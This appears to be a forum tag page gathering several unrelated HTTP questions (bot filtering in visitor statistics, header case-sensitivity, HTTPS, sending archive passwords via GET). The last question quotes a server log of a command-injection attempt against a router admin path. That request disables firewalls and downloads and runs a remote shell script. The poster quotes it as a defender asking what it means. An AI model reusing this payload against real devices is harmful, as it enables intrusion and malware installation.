问题[http]

管理面板中有一个简单的网站，您需要显示统计信息：每天、每月访问该网站的唯一用户总数等。

实施 IP 检查，以便检查对站点的每个请求。我通过发送 get 请求来检查 IPhttp://ipinfo.io/{ip_address}/

结果我注意到该网站收到了很多来自欧美国家的请求：

...
'ip': 'ip_adr', 'hostname': 'keok5.agenciasego.com.br', 'city': 'Denver', 'country': 'US'...
'ip': 'ip_adr', 'hostname': 'bc.googleusercontent.com', 'city': 'Brussels', 'country': 'BE' ...
'ip': 'ip_adr', 'hostname': 'msnbot.search.msn.com', 'city': 'Boydton', 'country': 'US' ...
...

我们能够使用主机名识别一些机器人，并且不会将它们添加到统计信息中，但并非所有地址都会在响应中收到主机名。

那么问题来了：如何区分真实用户和机器人，或者将用于统计的机器人数量减少到最少？存在哪些方法和选项？

将所有外部连接误认为机器人是不可行的，因为许多人都使用 VPN。

这些连接似乎很可疑，因为一天之内就收到了来自上海、新加坡、拉丁美洲国家等地向俄罗斯一个小型地区站点发出的多个请求。

http header 中的小写和大写字母有区别吗？

例如两个标头：

test: 123
Test: 123

它们会被视为相同还是不同？

https 是什么？它与 http 有何不同？

我正在编写一个文件共享网站。它包含一个用于浏览服务器文件夹中文件的树。用户单击该文件夹，并向服务器发送一个请求GET，其中包含该文件夹路径的参数。服务器返回JSON此文件夹中文件结构的表示，并且用户“展开”此文件夹的树枝。如果用户选择的文件是存档，则服务器返回JSON存档中文件夹结构的表示。如果存档使用密码加密，服务器将返回错误并要求用户输入密码，以便向他显示存档的内容。

问题是：

1. 如何使用GET质询安全地传输密码？（我知道这是一个愚蠢的想法，但我希望你能提出另一种方法。这不适合PUT我使用）

2. 如果存档是嵌套的并且用户需要输入两个密码，如何保存上一个请求的密码？

# Исходное дерево:

+--- Root
|    +--- Folder 1
|    \--- File 1

# Пользователь нажал на "Folder 1"

+--- Root
|    +--- Folder 1
|    |    +--- Folder 2
|    |    |--- Archive 1
|    |    \--- Folder 3
|    \--- File 1


# Пользователь нажал на "Archive 1"
# Сервер попытался отобразить файлы "Archive 1"
# и оказалось, что он требует пароль
# Сервер возвращает "Forbidden" и перед
# пользователем появляется модальное окно с
# предложением ввести пароль. Пользователь
# вводит пароль и он отправляется (КАК?)
# вместе с запросом "GET".

+--- Root
|    +--- Folder 1
|    |    +--- Folder 2
|    |    |--- Archive 1
|    |    |    +--- Folder 4
|    |    |    |--- Archive 2
|    |    |    |--- File 2
|    |    |    \--- Folder 5
|    |    \--- Folder 3
|    \--- File 1


# Если сейчас пользователь нажмёт на
# "Archive 2", то у меня будут проблемы,
# потому что сервер обязан будет помнить
# пароль от первого архива и должен
# запросить пароль от второго архива.
# Каждый раз сервер начинает обход папок
# с корня "ROOT" как функция
# "scandir".

我应该将密码存储在服务器上吗？在会议中？强制用户立即输入密码列表？存储在js中？如何安全储存和运输？

REST 意识形态对这项任务有何看法？这是一个例外还是有一些好的解决方案？如果我在服务器上以明文形式存储密码，我应该多久清除一次用户会话？

我发现我们新奇的 IT 初创公司的公共服务器正在接收奇怪的请求，显然是某种自动请求。请解释一下这可能是什么？

[GIN] 2023/08/23 - 11:49:28 
| 404 |       6.885µs | ip клиента(палить не буду, локация США) 
| GET      "/cgi-bin/luci/;stok=/locale?
form=country&operation=write&country=$(cd%20/tmp
%3Brm%20zizuo.sh%3Brm%20-rf%20zizuo.sh
%3Bufw%20disable%3Bsystemctl%20stop%20firewalld.service
%3Bsystemctl%20stop%20firewalld%3Bservice
%20iptables%C2%A0stop%3Bwget%20http%3A
//(тут тоже был ip , локация Нидерланды)/zizuo.sh%3Bchmod
%20777%20zizuo.sh%3Bsh%20zizuo.sh)"

我应该分析情况吗（如果是，如何分析）？安全问题值得担心吗？我们对这些人回复 404 好吗？